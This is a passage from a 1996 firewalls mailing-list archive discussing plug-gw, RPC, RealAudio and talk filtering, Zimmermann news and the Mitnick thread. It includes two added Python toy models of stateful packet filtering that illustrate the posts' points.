Where things get interesting is when the smart packet filters get to the point where they can perform very detailed checks (checks which, typically, are easier to do in application code than kernel code) if those are what is required.

I see a lot of firewalls that use plug-gw all over the place. As far as I am concerned, plug-gw is axiomatically equal to allowing a hole through a router. The firewall is a no-op except for the audit trail. Therefore, a router with a hole, and a sniffer with a log are equal to the firewall in that case (only faster).

In *SOME* cases, some of the classical application firewalls are able to do extra tricks or logging. Proxy HTTP firewalls, for example, or SMTP queuing systems which rewrite or search for evil addresses. If, supposing, someone had similar capabilities in the kernel of their smart packet filter, then what is the difference between user mode code and kernel code? (hint: one is harder to write, one is less portable, one is faster, one is more expensive) None of those properties, other than "harder to write" impacts security significantly.

Where things get really fascinating is in the case where the firewall allows direct unsolicited incoming traffic to an application behind it. This could be either a smart packet filter that has been told to allow all traffic in on port 25, or a router, or a classic application level firewall that has been configured to plug-gw all port 25 traffic to an internal mailhub. In that case, I submit to you that the 3 firewalls are equal except in cost, complexity, and performance. If the application you're talking to is sendmailV3.4 the firewall is completely moot.
*THAT* is why, traditionally, I have been leery of smart packet filters. They don't provide much extra control over the application stream. But neither does plug-gw. It depends a hell of a lot on what you're pumping over that application stream!!!

This is why I believe that the correct approach is to SECURE THE APPLICATION STREAM BEFORE YOU LET IT THROUGH, which is the work I am doing at V-ONE. But that is another story. :)

>However, is the RPC
>infrastructure itself without any actual RPC programs insecure??

Not really. There are the usual distinctions to make between a protocol and its implementation. :) Portmapper, for example, used to contain a few undocumented builtins, some of which could be coerced into doing interesting things to your machine. But, the infrastructure itself is fine. Indeed, if you code an RPC application and then put a "signed request" syntax into your procedure calls, you can build a mighty secure application!! Nobody does that kind of thing, though. :(

>Does it have
>any vulnerabilities in and of itself, or is the nature of RPC and how it maps
>ports (somewhat randomly) from a pool that you find insecure??

Nope. The problem with RPC is that most of the time, because of that random behaviour, existing firewall and security technologies can't cope with it. So you have a deadly combination of incompetently designed applications (from a security perspective) with the desire to simply shunt them through the firewall. This is bad. There's nothing INHERENTLY wrong with RPC, but the suite of tools that use it mostly stink. :)

Sorry about the long-winded answer.

mjr.
----
Chief Scientist, V-ONE Corporation
work      http://www.v-one.com
personal  http://www.clark.net/pub/mjr/mjr-top.html

From firewalls-owner Thu Jan 11 14:29:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01985 for firewalls-outgoing; Thu, 11 Jan 1996 13:24:26 -0800 (PST)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01980 for ; Thu, 11 Jan 1996 13:24:21 -0800 (PST)
Received: from pm4-22.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA25204; Thu, 11 Jan 96 16:23:15 -0500
Date: Thu, 11 Jan 96 16:23:15 -0500
Message-Id: <9601112123.AA25204@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: frankw@in.net (Frank Willoughby)
Subject: Newsbreak - Justice Dept. decides not to prosecute Phil Zimmermann
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It was just announced in the Cypherpunks mailing list that the Justice Dept. decided not to prosecute Phil Zimmermann. The mail pointed to several references:

    http://www.eff.org/~mech/
    http://www.eff.org/
    http://www.eff.org/A/

Best Regards,

Frank

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified/
The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.
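The "what goes out can come back in / what wasn't invited in isn't welcome" model that Marcus Ranum lays out in his Firewalls-Digest reply above, and his point that a plug-gw rule or a port-25 pass-through is "a hole through a router" with an audit line, can be made concrete in a few lines. What follows is an added illustration written for this archive; it is not code from the list, from V-ONE, from Checkpoint or from the TIS toolkit. The hosts, ports and the static-hole rule are constructed for the demo, and the model is deliberately minimal (no sequence-number or TCP-state checking, no timeouts).

```python
"""Toy model of Ranum's firewall semantics: track flows opened from inside,
let only their replies back in, and show what a 'static hole' buys you.
Added example for the archive; all hosts and ports below are constructed."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = "tcp"
    syn: bool = False  # TCP only: True on the connection-opening segment


Flow = Tuple[str, int, str, int, str]  # (src, sport, dst, dport, proto)


class StatefulFilter:
    """Remembers flows initiated from the inside and passes only their replies.

    static_holes is a set of (proto, dport) passed inbound regardless of state:
    the 'plug-gw all port 25 to the mailhub' case from the post.  The filter
    still writes an audit line for it, but exercises no control over the stream."""

    def __init__(self, inside: Set[str], static_holes: Iterable[Tuple[str, int]] = ()):
        self.inside = inside
        self.static_holes = set(static_holes)
        self.flows: Set[Flow] = set()
        self.log: List[str] = []

    @staticmethod
    def _flow(p: Packet) -> Flow:
        return (p.src, p.sport, p.dst, p.dport, p.proto)

    @staticmethod
    def _reverse(p: Packet) -> Flow:
        # The outbound flow an inbound packet would be a reply to.
        return (p.dst, p.dport, p.src, p.sport, p.proto)

    def _log(self, verdict: str, p: Packet) -> None:
        self.log.append(f"{verdict} {p.src}:{p.sport} -> {p.dst}:{p.dport}/{p.proto}")

    def handle(self, p: Packet) -> bool:
        """Return True if the packet is passed, False if it is dropped."""
        if p.src in self.inside:
            # Outbound: record the flow (on the SYN for TCP, on any datagram for UDP).
            if p.proto != "tcp" or p.syn:
                self.flows.add(self._flow(p))
            self._log("PASS out", p)
            return True
        if self._reverse(p) in self.flows:
            self._log("PASS reply", p)        # it was invited in
            return True
        if (p.proto, p.dport) in self.static_holes:
            self._log("PASS hole", p)         # a hole through a router, plus an audit line
            return True
        self._log("DROP unsolicited", p)      # it wasn't invited
        return False


def demo() -> Dict[str, bool]:
    """Constructed traffic: 10.0.0.0/8 is 'inside', 192.0.2.0/24 is 'the net'."""
    fw = StatefulFilter(inside={"10.0.0.5", "10.0.0.25"}, static_holes={("tcp", 25)})
    out: Dict[str, bool] = {}
    # 1. An inside client opens HTTP to the net; the server's reply is let back in.
    out["out_syn"] = fw.handle(Packet("10.0.0.5", 40000, "192.0.2.80", 80, syn=True))
    out["reply"] = fw.handle(Packet("192.0.2.80", 80, "10.0.0.5", 40000))
    # 2. An unsolicited inbound connection to that client is dropped.
    out["unsolicited"] = fw.handle(Packet("192.0.2.99", 31337, "10.0.0.5", 22, syn=True))
    # 3. A "reply" from a port the client never talked to matches no flow.
    out["wrong_port"] = fw.handle(Packet("192.0.2.80", 81, "10.0.0.5", 40000))
    # 4. The static hole: anything to port 25 on the mailhub passes, state or not.
    out["hole"] = fw.handle(Packet("192.0.2.99", 31337, "10.0.0.25", 25, syn=True))
    return out


if __name__ == "__main__":
    fw_results = demo()
    for name, passed in fw_results.items():
        print(f"{name:12s} {'PASS' if passed else 'DROP'}")
```

The demo's last case is the one Ranum calls "completely moot": once the rule is "all port 25 in", the filter's verdict no longer depends on anything it knows, and whatever is listening on the mailhub is what decides the security of that traffic.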
From firewalls-owner Thu Jan 11 14:56:58 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03346 for firewalls-outgoing; Thu, 11 Jan 1996 14:13:37 -0800 (PST)
Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03341 for ; Thu, 11 Jan 1996 14:13:31 -0800 (PST)
Received: from subzero (dufresne@subzero.winternet.com [198.174.169.6]) by icicle (8.6.12/8.6.12) with ESMTP id QAA13020; Thu, 11 Jan 1996 16:12:18 -0600
Received: (from dufresne@localhost) by subzero (8.6.12/8.6.12) id QAA14085; Thu, 11 Jan 1996 16:11:44 -0600
Posted-Date: Thu, 11 Jan 1996 16:11:44 -0600
Date: Thu, 11 Jan 1996 16:11:44 -0600 (CST)
From: Ron DuFresne
To: Brain21
cc: Ng Pheng Siong, Frank Willoughby, firewalls@GreatCircle.COM, John Young
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 11 Jan 1996, Brain21 wrote:

> On Thu, 11 Jan 1996, Ng Pheng Siong wrote:
>
> >
> > Shimomura had almost complete packet traces of the break-in, which
> > allowed him to reconstruct the attack.

False! Mitnick hid his tracks far too well to be traced in any fashion via logs. All tracks pointed to places far far away, almost to the point of appearing to come from never-never land... Took electronic eavesdropping and the tracing of compromised phone switches to locate mitnick to N.C alone...

> >
> > It was a trap.
> >
> Personally I can not conclude that from what you have stated. I would
> hope that he would be logging stuff as a matter of course. How did he
> KNOW that Mitnick or any one was going to attack his machine
> specifically? If it were done "to see what happens" then maybe I could
> buy it, but if it were "a trap for Mitnick" he would have to be psychic
> as well.
>
> Brain21
>

Later,

Ron Dufresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Thu Jan 11 15:14:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05267 for firewalls-outgoing; Thu, 11 Jan 1996 14:55:18 -0800 (PST)
Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA05260; Thu, 11 Jan 1996 14:55:11 -0800 (PST)
Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id OAA18278; Thu, 11 Jan 1996 14:54:11 -0800 (PST)
X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f
Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma018276; Thu Jan 11 14:54:03 1996
Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id OAA19497; Thu, 11 Jan 1996 14:54:14 -0800 (PST)
Date: Thu, 11 Jan 1996 14:54:14 -0800 (PST)
From: Brian Murrell
Message-Id: <199601112254.OAA19497@mocha.bctel.net>
To: murrell@bctel.net, Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com, Brent@GreatCircle.COM
Subject: Re: Firewalls-Digest V5 #14
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-MD5: z8jI5+ZA3tRxySPTLFyerw==
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Two problems here. First, not everybody has Firewall-1 filtering systems,
> or any other stateful filtering system. It's good that those who do can
> deal with RealAudio, but it doesn't change the fact that the RealAudio
> protocol is poorly designed, at least from a security point of view.

No argument here. I would prefer to proxy it, that way the audience is bigger.
Some people are happy with stateful filtering, however others will go no closer to the edge than proxies.

> Second, even this only works if all you want are outgoing connections.

Yeah. I'm not sure of the point. I'll assume that you are talking about putting a RA server behind a firewall. I have not actually watched a trace of RealAudio, but I would presume that the server is contacted by the client on a predefined port. That being, you would put a filter in your router for it much like HTTP, etc. The response traffic (which is the problematic undetermined UDP port problem) would be outbound from the FW's point of view. Do you normally restrict outbound UDP traffic on your filters?? (Sounds sarcastic - is not).

> Again, only if all you want to allow are outgoing connections.

I don't think so. I've yet to actually implement RPC (not sure I want to :-) services on FW-1, so conjecture follows... however I would think that you can setup filters to allow portmapper traffic in and out. FW-1 will watch that learn what services are on what ports on various machines. Additional rules can then be set up to allow/disallow certain RPC services to and from certain machines.

> It's the nature of RPC that makes it difficult to control. You can't
> easily allow some RPC-based services and disallow others. You can't easily
> disallow all RPC-based services, even.

Assuming the above conjecture as fact, I would think you can. You could be as specific as you want, no??

Thanx for the POV.

b.
--
Brian J. Murrell                           murrell@bctel.net
BCTel Advanced Communications              brian@ilinx.com
Vancouver, B.C.                            brian@wimsey.com
604 454 5261

From firewalls-owner Thu Jan 11 16:29:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA09275 for firewalls-outgoing; Thu, 11 Jan 1996 16:07:04 -0800 (PST)
Received: from case.cyberspace.com (case.cyberspace.com [199.2.48.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA09270 for ; Thu, 11 Jan 1996 16:06:50 -0800 (PST)
Received: from case.cyberspace.com ([199.2.48.12]) by case.cyberspace.com (post.office MTA v1.9.1 ID# 0-11430) with SMTP id AAA26978 for ; Thu, 11 Jan 1996 16:04:56 -0800
Date: Thu, 11 Jan 1996 16:04:55 -0800 (PST)
From: billcurr@cyberspace.com (Bill Curr)
To: firewalls@greatcircle.com
Subject: "Title for Firewall Admin?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The mail administrator is "postmaster"
The web server admin is "webmaster"

Is there such a title for a firewall administrator? And is there a list of these colorful "nom de nets" anywhere?
-Thanks
Bill

From firewalls-owner Thu Jan 11 16:44:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA08646 for firewalls-outgoing; Thu, 11 Jan 1996 15:57:13 -0800 (PST)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.235.78]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA08641 for ; Thu, 11 Jan 1996 15:57:08 -0800 (PST)
Received: (karyn@localhost) by diablo.cisco.com (8.6.10/CISCO.SERVER.1.1) id PAA01980; Thu, 11 Jan 1996 15:59:41 -0800
From: Karyn Pichnarczyk
Message-Id: <199601112359.PAA01980@diablo.cisco.com>
Subject: PLEASE discontinue thread on Tsutomu and Mitnick
To: dufresne@winternet.com (Ron DuFresne)
Date: Thu, 11 Jan 1996 15:59:40 -0800 (PST)
Cc: brain21@montag33.residence.gatech.edu, Doug.Hughes@Eng.Auburn.EDU, firewalls@GreatCircle.COM
In-Reply-To:
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Would you people please stick to the subject of this mailing list and take your Tsutomu theories off of firewalls?

If you are wondering what Tsutomu was thinking, why don't you simply ASK HIM. He's on the net. If he wants to answer, he will. If not, you lose. You can always read his book or the other one on Mitnick if you want more insight.

But I think I speak for most people on this list when I ask you to please take your petty conjectures of Tsutomu's motivations offline.

Thank you,
karyn

From firewalls-owner Thu Jan 11 16:59:07 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11722 for firewalls-outgoing; Thu, 11 Jan 1996 16:46:21 -0800 (PST)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA11710 for ; Thu, 11 Jan 1996 16:46:14 -0800 (PST)
Received: from pm3-26.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA08155; Thu, 11 Jan 96 19:45:14 -0500
Date: Thu, 11 Jan 96 19:45:14 -0500
Message-Id: <9601120045.AA08155@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: frankw@in.net (Frank Willoughby)
Subject: Re: Newsbreak - Justice Dept. decides not to prosecute Phil Zimmermann
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

FWIW, I double-checked with EFF & confirmed the statement that the investigation of Phil Zimmermann is indeed over. EFF said that they will post a message in the "Alert" section. A pointer to the "Alert" section is located on their home page.

BTW, the references I posted were from the original author's sig file. Sorry for the confusion.

Best Regards,

Frank

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified/
The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.
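Brian Murrell's Firewalls-Digest reply earlier in this archive raises the "problematic undetermined UDP port problem": a RealAudio-style stream comes back from a port that plain reverse-tuple matching cannot predict, and the only way a filter learns it is by reading the port "in the clear" off the control channel, as Ranum and Murrell compare to FTP's PORT command. The sketch below is an added illustration for the archive, not code from the list, from Progressive Networks or from any firewall vendor. The `STREAM-FROM ... TO ...` control line is a constructed stand-in and is not RealAudio's real wire format; the hosts, ports and timeout are constructed too.

```python
"""Toy expectation table for UDP replies that arrive on a port learned
from a control channel (the 'undetermined UDP port' case), with expiry.
Added example for the archive; the control-line format is constructed."""
import re
from typing import Dict, Tuple

# Constructed control-channel line announcing server source port and client
# destination port for the coming stream.  NOT RealAudio's real protocol.
STREAM_LINE_RE = re.compile(r"^STREAM-FROM:\s*(\d{1,5})\s+TO:\s*(\d{1,5})\s*$")

ExpectKey = Tuple[str, int, str, int]  # (server_ip, server_port, client_ip, client_port)


class ExpectationTable:
    """Inbound UDP is accepted only when an expectation exists for it.

    Expectations come from an outbound datagram (ordinary reverse-tuple
    matching, good enough for DNS) or from a helper that parsed the TCP
    control channel.  Every expectation carries a deadline so a port that
    was opened for a stream does not stay open for good."""

    def __init__(self, ttl: int = 30):
        self.ttl = ttl
        self.expect: Dict[ExpectKey, int] = {}

    def _expire(self, now: int) -> None:
        self.expect = {k: deadline for k, deadline in self.expect.items() if deadline > now}

    def outbound_udp(self, src: str, sport: int, dst: str, dport: int, now: int) -> None:
        """An inside host sent a datagram; its reply from (dst, dport) is expected."""
        self.expect[(dst, dport, src, sport)] = now + self.ttl

    def control_line(self, client: str, server: str, line: str, now: int,
                     helper: bool = True) -> bool:
        """Feed one line of the client<->server control channel to the helper.
        Returns True if an expectation was installed."""
        if not helper:
            return False  # a filter without the helper learns nothing here
        m = STREAM_LINE_RE.match(line)
        if not m:
            return False
        server_port, client_port = int(m.group(1)), int(m.group(2))
        # Sanity check, in the spirit of FTP PORT-bounce defences: never let the
        # control channel open a pinhole onto a privileged or invalid port.
        if not (1024 <= server_port <= 65535 and 1024 <= client_port <= 65535):
            return False
        self.expect[(server, server_port, client, client_port)] = now + self.ttl
        return True

    def inbound_udp(self, src: str, sport: int, dst: str, dport: int, now: int) -> bool:
        """Return True if the datagram matches a live expectation (which is refreshed)."""
        self._expire(now)
        key = (src, sport, dst, dport)
        if key in self.expect:
            self.expect[key] = now + self.ttl
            return True
        return False


def demo() -> Dict[str, bool]:
    """Constructed scenario: inside client 10.0.0.5, stream server 192.0.2.40."""
    client, server = "10.0.0.5", "192.0.2.40"
    control = "STREAM-FROM: 6970 TO: 7070"
    out: Dict[str, bool] = {}
    # Without the helper the stream arrives on a port nothing predicted: dropped.
    plain = ExpectationTable()
    plain.control_line(client, server, control, now=0, helper=False)
    out["no_helper"] = plain.inbound_udp(server, 6970, client, 7070, now=1)
    # With the helper the ports were read off the control channel: allowed.
    smart = ExpectationTable(ttl=30)
    smart.control_line(client, server, control, now=0)
    out["helper"] = smart.inbound_udp(server, 6970, client, 7070, now=1)
    # A datagram from a different host to the same client port matches nothing.
    out["other_host"] = smart.inbound_udp("192.0.2.99", 6970, client, 7070, now=2)
    # The expectation (last refreshed at t=1, ttl 30) has expired by t=100.
    out["expired"] = smart.inbound_udp(server, 6970, client, 7070, now=100)
    # Ordinary request/response UDP still works by reverse-tuple matching.
    smart.outbound_udp(client, 40001, "192.0.2.53", 53, now=0)
    out["dns_reply"] = smart.inbound_udp("192.0.2.53", 53, client, 40001, now=5)
    return out


if __name__ == "__main__":
    for name, passed in demo().items():
        print(f"{name:10s} {'PASS' if passed else 'DROP'}")
```

The two things the example adds to Murrell's description are the deadline on every learned port and the refusal to act on a control line that names a privileged port; both are the checks one would want before letting a control channel punch holes in the filter, and neither exists in a router ACL.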
From firewalls-owner Thu Jan 11 17:29:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14071 for firewalls-outgoing; Thu, 11 Jan 1996 17:23:12 -0800 (PST)
Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14065; Thu, 11 Jan 1996 17:23:04 -0800 (PST)
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 Jan 1996 17:23:23 +0100
To: billcurr@cyberspace.com (Bill Curr), firewalls@greatcircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: "Title for Firewall Admin?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 4:04 PM 1/11/96, Bill Curr wrote:
>The mail administrator is "postmaster"
>The web server admin is "webmaster"
>Is there such a title for a firewall administrator?

scapegoat

-Brent
----------------------+----------------------------+------------------------
Brent Chapman         | Great Circle Associates    | 1057 West Dana Street
Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041
----------------------+----------------------------+------------------------
                    Internet Tutorials from the Experts!

From firewalls-owner Thu Jan 11 17:35:54 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14125 for firewalls-outgoing; Thu, 11 Jan 1996 17:24:16 -0800 (PST)
Received: from deimos (pm001-22.dialip.mich.com [198.108.16.151]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14111 for ; Thu, 11 Jan 1996 17:24:02 -0800 (PST)
Received: (from root@localhost) by deimos (8.6.10/8.6.9) id UAA00248; Thu, 11 Jan 1996 20:22:38 -0500
Date: Thu, 11 Jan 1996 20:22:35 -0500 (EST)
From: Tom Zerucha
Reply-To: zerucha@shell.portal.com
To: "Paul A. Fisher"
cc: firewalls@GreatCircle.COM
Subject: Re: Allow SSL through a firewall?
In-Reply-To: <9601101859.AA09343@ci.deere.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I haven't tried this, but you might be able to get SOCKS to work in reverse. SSL works from Web Browsers through a socks firewall, but you need to set the proxy entry in the server. Then configure SOCKS on the bastion host to allow only connections from the client's range of IP addresses to the Commerce HTTPS server only using the 443 port.

zerucha@shell.portal.com
finger zerucha@jobe.portal.com for PGP key

From firewalls-owner Thu Jan 11 17:44:14 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14781 for firewalls-outgoing; Thu, 11 Jan 1996 17:36:11 -0800 (PST)
Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14761 for ; Thu, 11 Jan 1996 17:35:58 -0800 (PST)
Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id TAA29029; Thu, 11 Jan 1996 19:33:35 -0600
Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id TAA06437; Thu, 11 Jan 1996 19:33:34 -0600
Posted-Date: Thu, 11 Jan 1996 19:33:34 -0600
Date: Thu, 11 Jan 1996 19:33:34 -0600 (CST)
From: Ron DuFresne
To: Mike Tighe
cc: Scott_Rickard@mc.xerox.com, firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, jya@pipeline.com, frankw@in.net
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG
In-Reply-To: <199601111510.JAA20468@softserv.tcst.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 11 Jan 1996, Mike Tighe wrote:

> Rickard,Scott writes:
>
> >>I would like to know this... if Shimomura is so good (an I actually
> >>believe that he may be) then why did he leave the r-utils enabled? Why
> >>did he not use TCPWrappers to prevent spoofing?
> >>Why did he allow people
> >>to see inside his network (Mitnick saw that there was a machine
> >>"X-something" that he believed was trusted by Shimomura's machine)?
>
> Obviously there were some holes in his system that should have been
> plugged, but that does not mean it was his responsibility to have fixed
> them?
>
>

Actually, since it was T. S.'s HOME machine, I'd venture that it was his responsibility. Let's not forget the fact that T. S.'s box had 'special' tools T. S. had that enabled Mitnick to further his attacks, all the more reason that this box should have had very strict security, don't you think?

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Thu Jan 11 17:44:22 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA13844 for firewalls-outgoing; Thu, 11 Jan 1996 17:19:19 -0800 (PST)
Received: from arthur.cs.purdue.edu (arthur.cs.purdue.edu [128.10.2.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA13830 for ; Thu, 11 Jan 1996 17:19:05 -0800 (PST)
Received: from narnia.cs.purdue.edu (swlodin@narnia.cs.purdue.edu [128.10.17.74]) by arthur.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) with ESMTP id ; Thu, 11 Jan 1996 20:18:08 -0500
Received: (swlodin@localhost) by narnia.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) id ; Thu, 11 Jan 1996 20:18:04 -0500
From: swlodin@cs.purdue.edu (Steve Lodin)
Message-Id: <199601120118.UAA21888@narnia.cs.purdue.edu>
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG
To: brain21@montag33.residence.gatech.edu (Brain21)
Date: Thu, 11 Jan 1996 20:18:02 -0500 (EST)
Cc: frankw@in.net, firewalls@greatcircle.com
In-Reply-To: from "Brain21" at Jan 11, 96 01:09:12 pm
X-URL: http://www.cs.purdue.edu/people/swlodin
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Someone asked about the Tubed information. Part of what Ed pointed was my CMAD Workshop report where Tsutomu first publicly announced the breakin. It is available at:

    http://www.cs.purdue.edu/homes/swlodin/cmad/report.html

My wife said that Mitnick and Shimomura will be featured on Dateline tomorrow (Friday). Can anyone confirm?

Steve
--
Steve Lodin
Purdue - swlodin@cs.purdue.edu            http://www.cs.purdue.edu/people/swlodin
Delco Electronics - swlodin@delcoelect.com    (317)451-0479
Home - swlodin@iquest.net                 http://www.iquest.net/~swlodin/

From firewalls-owner Thu Jan 11 18:14:13 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14701 for firewalls-outgoing; Thu, 11 Jan 1996 17:35:07 -0800 (PST)
Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14687; Thu, 11 Jan 1996 17:34:57 -0800 (PST)
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 Jan 1996 17:35:16 +0100
To: Brian Murrell, Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Firewalls-Digest V5 #14
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 2:54 PM 1/11/96, Brian Murrell wrote:
>> Second, even this only works if all you want are outgoing connections.
>
>Yeah. I'm not sure of the point. I'll assume that you are talking about
>putting a RA server behind a firewall. I have not actually watched a trace of
>RealAudio, but I would presume that the server is contacted by the client on a
>predefined port.
That being, you would put a filter in your router for it >much >like HTTP, etc. The response traffic (which is the problematic >undetermined UDP >port problem) would be outbound from the FW's point of view. Do you normally >restrict outbound UDP traffic on your filters?? (Sounds sarcastic - is not). I wasn't speaking just of RealAudio; I was talking about this situation in general, where you're trying to reverse engineer some protocol. "Talk" is another example of a messy protocol that's hard or impossible to safely allow through a filtering system, stateful or otherwise; see the discussion of it on pp. 270-272 of my book "Building Internet Firewalls" (by the way, in figure 8-11 on p. 271, the lower box in the "Host 2" area should be labelled "Answering Client", not "Answering Server"). Basicly, you've got to allow outgoing UDP packets, incoming UDP packets, and an incoming TCP connection in order for an outbound "talk" session (where one of your users calls someone at another site) to function. >> Again, only if all you want to allow are outgoing connections. > >I don't think so. I've yet to actually implement RPC (not sure I want to :-) >services on FW-1, so conjecture follows... however I would think that you can >setup filters to allow portmapper traffic in and out. FW-1 will watch that >learn what services are on what ports on various machines. Additional >rules can >then be set up to allow/disallow certain RPC services to and from certain >machines. You could do theoretically do it, but it's complicated. Complicated is bad, in a security sense. Complicated means that there are lots of little nooks and crannies for problems to hide in. Most of us have looked at traditional RPC-based services (YP/NIS, NFS, etc.) and decided that they weren't something we wanted to allow access to from beyond our perimeters anyway. 
